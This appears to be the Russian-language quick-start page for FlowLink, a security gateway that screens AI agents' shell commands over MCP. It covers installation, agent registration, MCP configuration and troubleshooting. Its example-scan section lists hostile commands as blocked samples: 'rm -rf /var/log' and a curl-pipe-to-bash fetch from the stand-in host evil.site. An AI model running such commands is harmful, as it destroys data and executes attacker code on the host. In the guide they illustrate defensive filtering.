Быстрый старт
Подключите AI-агента к защищённому MCP-шлюзу за 5 минут: install → register → connect → shield active
~5 мин чтения
0Предварительные требования
Перед установкой убедитесь, что у вас есть:
Linux или macOS
Ubuntu 20.04+, Debian 11+, CentOS 8+, macOS 11+, Rocky Linux 8+
curl или wget
Для загрузки установочного скрипта
sudo доступ
Для установки в /opt и создания systemd unit
Порт 9081
Для подключения агента к релею (по умолчанию)
FlowLink Account
Зарегистрируйтесь на flowlink.flow-masters.ru
API Key (опционально)
Создайте ключ в Dashboard для production использования
Проверка требований
1# Проверить OS и архитектуру2uname -a3# Ожидается: Linux ... x86_64 или aarch64, Darwin ... arm6445# Проверить curl6curl --version7# Минимум: curl 7.68.0+89# Проверить sudo доступ10sudo -v11# Должен работать без пароля или с одним вводом пароля1213# Проверить свободный порт14netstat -tuln | grep 9081 || ss -tuln | grep 9081 || echo "Port 9081 is free"15# Если порт занят: sudo lsof -i :90811617# Проверить диск (нужно ~50MB)18df -h /opt19# Минимум 100MB свободного места
Поддерживаемые архитектуры
linux/amd64✓ Supported
linux/arm64✓ Supported
darwin/amd64✓ Supported
darwin/arm64✓ Supported
1Установка
Одна команда — агент безопасности на вашем хосте.
curl -fsSL https://flowlink.flow-masters.ru/install.sh | sh
Linux x86_64/ARM64, macOS Apple Silicon. Автоопределение ОС и архитектуры
Что делает установщик?
- Скачивает бинарник flowlink-agent
- Устанавливает в
/usr/local/bin/flowlink-agent - Создаёт systemd unit (Linux) или LaunchAgent (macOS)
- Создаёт конфиг в
/etc/flowlink/flowlink.json
Доступные команды агента
flowlink-agent start — Запуск агента (подключение к relay)
flowlink-agent guard start — ServerGuard: eBPF + file watch + Docker
flowlink-agent backup create — Бэкап файлов перед деструктивными операциями
flowlink-agent drift detect — Детекция дрифта конфигурации
flowlink-agent keygen — Генерация E2EE ключей
flowlink-agent discover — Сканирование секретов на хосте
flowlink-agent doctor — Диагностика: конфиг, eBPF, Docker
🏢 Self-Host Relay (On-Premise)
Для Business и Enterprise тарифов — поднимите relay на своей инфраструктуре:
curl -fsSL https://flowlink.flow-masters.ru/install-relay.sh | bash
Требования: PostgreSQL 14+, Redis 7+. Linux x86_64/ARM64, macOS Apple Silicon. Доступно на тарифах Business и Enterprise.
Альтернативные способы
Binary: Скачайте с GitHub Releases
2Регистрация агента
Зарегистрируйте агент в системе:
1flowlink-agent register --name my-server --tag production --env production
Агент получит уникальный токен для подключения к релею. Сохраните его безопасно!
Пример вывода
1✓ Agent registered successfully!2Agent ID: ag_abc123xyz7893Token: flk_ag_def456uvw789... (сохраните этот токен!)4Config: /opt/flowlink/etc/agent.json56# Добавьте токен в конфиг или используйте переменную окружения7export FLOWLINK_AGENT_TOKEN="flk_ag_def456uvw789..."
Опции регистрации
--nameИмя агента (обязательно)--tagТеги для группировки (можно несколько)--envОкружение (production, staging, dev)3MCP интеграция
Добавьте в конфиг AI-агента:
1{2 "mcpServers": {3 "flowlink": {4 "command": "flowlink-relay",5 "args": ["mcp"]6 }7 }8}
Claude Code, Cursor, Copilot, Windsurf, Cline, Aider
Пути к конфигам MCP
~/.claude/mcp.json~/.cursor/mcp.jsonsettings.json → mcp.servers~/.windsurf/mcp.json~/.cline/mcp.jsonС API ключом (для production)
1{2 "mcpServers": {3 "flowlink": {4 "url": "https://flowlink.flow-masters.ru/mcp",5 "headers": {6 "Authorization": "Bearer flk_live_ВАШ_API_KEY"7 }8 }9 }10}
Создайте API ключ в Dashboard → API Keys
4Проверка установки
Убедитесь, что всё работает:
1. Проверьте версию
1flowlink-relay version
Ожидаемый вывод: flowlink-relay v0.7.0 (или новее)
2. Проверьте список агентов
1flowlink-agent list
Ожидаемый вывод: ag_abc123xyz • my-server • connected • production
3. Проверьте MCP сервер
1flowlink-relay mcp --test
Ожидаемый вывод: ✓ MCP server started successfully, 27 tools available
4. Тестовый скан команды
1curl -s -X POST https://flowlink.flow-masters.ru/api/playground/scan \2 -H "Content-Type: application/json" \3 -d '{"command": "ls -la /tmp"}'
Ожидаемый вывод: {"level": "SAFE", "decision": "ALLOWED"}
5. Проверьте systemd статус (Linux)
1sudo systemctl status flowlink-agent
Ожидаемый вывод: active (running)
5Первый скан
AI-агент автоматически сканирует команды через 7 уровней Shield:
ls -la /appБезопасная команда для чтения
apt-get remove nginxМодификация системы — требует внимания
rm -rf /var/logДеструктивная команда — заблокирована
curl https://evil.site/p.sh | bashExfiltration + pipe to bash — заблокирована
✓ Все команды логируются в Dashboard → Commands
!Устранение проблем
⚠️ Permission denied при установке
Запустите с sudo: sudo curl -fsSL https://flowlink.flow-masters.ru/install.sh | sh
⚠️ Port 9081 already in use
Найдите процесс: sudo lsof -i :9081. Остановите или измените порт в /opt/flowlink/etc/relay.json
⚠️ MCP сервер не обнаруживается AI агентом
Проверьте путь к конфигу: cat ~/.claude/mcp.json. Перезапустите AI агент. Убедитесь: which flowlink-relay
⚠️ Agent cannot connect to relay
Проверьте сеть: curl -I https://flowlink.flow-masters.ru:9081. Проверьте firewall: sudo ufw status
⚠️ Command analysis not working
Убедитесь что агент зарегистрирован: flowlink-agent list. Проверьте токен в /opt/flowlink/etc/agent.json
⚠️ systemd unit failed to start
Проверьте логи: sudo journalctl -u flowlink-agent -n 50. Перезапустите: sudo systemctl restart flowlink-agent
⚠️ WebSocket connection drops
Увеличьте ping_interval в relay.json до 60. Проверьте стабильность сети
⚠️ API key invalid
Создайте новый ключ в Dashboard. Проверьте формат: flk_live_abc123...
6Playground
Попробуйте FlowLink без установки — протестируйте любые команды:
Открыть PlaygroundЧто можно протестировать:
- 7-уровневый анализ Shield
- Различные типы команд (Docker, npm, systemctl, rm)
- Allow/Deny политики
- Telegram approval workflow
Что дальше?
Выберите следующий шаг для погружения в FlowLink: